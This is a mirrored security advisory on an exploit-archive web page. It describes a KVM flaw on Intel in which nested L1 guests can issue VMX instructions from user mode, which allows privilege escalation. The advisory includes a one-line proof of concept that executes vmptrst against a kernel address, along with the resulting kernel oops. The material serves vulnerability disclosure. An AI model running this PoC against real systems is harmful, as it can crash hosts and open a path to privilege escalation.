首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
KVM (Nested Virtualization) - L1 Guest Privilege Escalation
来源:Google Security Research 作者:Google 发布时间:2018-06-28  
When KVM (on Intel) virtualizes another hypervisor as L1 VM it does not verify that VMX instructions from the L1 VM (which trigger a VM exit and are emulated by L0 KVM) are coming from ring 0.
 
For code running on bare metal or VMX root mode this is enforced by hardware. However, for code running in L1, the instruction always triggers a VM exit even when executed with cpl 3. This behavior is documented by Intel (example is for the VMPTRST instruction):
 
(Intel Manual 30-18 Vol. 3C)
IF (register operand) or (not in VMX operation) or (CR0.PE = 0) or (RFLAGS.VM = 1) or (IA32_EFER.LMA = 1 and CS.L = 0)
 THEN #UD;
ELSIF in VMX non-root operation
 THEN VMexit;
ELSIF CPL > 0
 THEN #GP(0);
ELSE
 64-bit in-memory destination operand ← current-VMCS pointer;
 
This means that a normal user space program running in the L1 VM can trigger KVMs VMX emulation which gives a large number of privilege escalation vectors (fake VMCS or vmptrld / vmptrst to a kernel address are the first that come to mind). As VMX emulation code checks for the guests CR4.VMXE value this only works if a L2 guest is running.
 
A somewhat realistic exploit scenario would involve someone breaking out of a L2 guest (for example by exploiting a bug in the L1 qemu process) and then using this bug for privilege escalation on the L1 system. 
 
Simple POC (tested on L0 and L1 running Ubuntu 18.04 4.15.0-22-generic).
This requires that a L2 guest exists:
 
echo 'main(){asm volatile ("vmptrst 0xffffffffc0031337");}'| gcc -xc - ; ./a.out
 
[ 2537.280319] BUG: unable to handle kernel paging request at ffffffffc0031337
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Foxit Reader 9.0.1.1049 - Remo
·Quest KACE Systems Management
·Opencart < 3.0.2.0 - Denial of
·Microsoft Internet Explorer HT
·IPConfigure Orchid VMS 2.0.5 -
·Polaris Office 2017 8.1 Remote
·Audiograbber 1.83 - Local Buff
·Cisco Adaptive Security Applia
·Pale Moon Browser < 27.9.3 - U
·Geutebruck 5.02024 G-Cam/EFD-2
·Nikto 2.1.6 - CSV Injection
·Core FTP LE 2.2 - Buffer Overf
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved